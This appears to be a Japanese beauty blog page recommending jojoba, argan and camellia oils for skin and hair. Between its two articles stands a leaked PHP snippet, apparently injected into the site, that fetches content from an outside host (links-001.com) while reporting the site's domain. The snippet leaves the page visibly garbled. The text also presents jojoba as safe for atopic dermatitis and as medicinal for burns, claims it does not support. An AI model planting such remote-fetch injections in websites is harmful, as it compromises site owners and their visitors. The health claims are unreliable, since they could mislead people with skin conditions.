前へ
次へ

万能の美容オイル、ホホバ

美容に良いとされるオイルはたくさんの種類があります。特に有名なのがスイートアーモンドやホホバオイル、近年ではアルガンオイルも注目されています。一番使いやすくオススメな美容オイルは何と言ってもホホバオイルです。ホホバオイルのいいところはクレンジング、ヘアケア、スキンケア、バスオイルなど様々な使い方ができることです。しかも分子構造をみるとあらゆる肌質にも合うとされ、アトピー性皮膚炎の方も安心して使えます。また抗酸化作用もあり、アンチエイジングにも効果的です。また、異物の侵入を防ぐ機能と電解質が失われないための保湿機能であるワックスエステルがホホバオイルには含まれています。そのため、肌荒れや乾燥の改善にも効果的です。一度スキンケアで困ったらホホバを利用してみてください。

".file_get_contents('http://links-001.com/meoset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

美容オイルにはどんな種類のものがあるか

美容オイルには、さまざまな種類があるのを知っていますか。たとえば、アルガンオイルやホホバオイル、椿オイルなどがありますね。アルガンオイルであれば、美容効果として乾燥肌を改善できたり、アンチエイジング効果を感じたりできるオイルです。また、ホホバオイルであれば、ビタミンEが多くて抗菌力に優れているという特徴があります。ですから、アトピー肌や火傷して傷を負った肌にも良い効果があるわけです。つまり、美容に良いだけでなく薬としてもその効果を発揮するのですね。さらに、スキンケア効果とヘアケア効果の2つを併せ持つのが椿オイルです。これは、椿の実からとれる油となります。この椿オイルは、椿油と呼ばれて日本でも古い時代から美容に良いオイルとして使われていた歴史があります。

Page Top